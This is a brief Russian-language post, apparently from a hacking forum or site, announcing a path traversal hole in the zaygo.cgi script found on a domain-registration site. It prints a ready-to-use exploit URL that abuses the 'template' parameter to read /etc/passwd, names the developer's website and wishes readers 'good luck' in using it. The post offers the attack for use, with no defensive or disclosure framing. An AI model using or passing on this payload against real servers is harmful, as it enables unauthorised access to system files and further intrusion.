Вот бороздя просторы интернета в очередной раз удивился глупости программеров. Найдя скрипт
zaygo.cgi на одном из ведущих сайтов по регистрации доменов я решил глянуть его. Какого же
было мое удивление, когда я увидел его работу, а главное параметры, которые через него проходят:

zaygo.cgi?template=

Тут уж конечно все стало на свои места. Итак:

Уязвимость: zaygo.cgi
Эксплоит : zaygo.cgi?template=/../../../../../../etc/passwd

Сайт команды разработчиков: http://www.zaygo.com.
Удачи!



Оставить мнение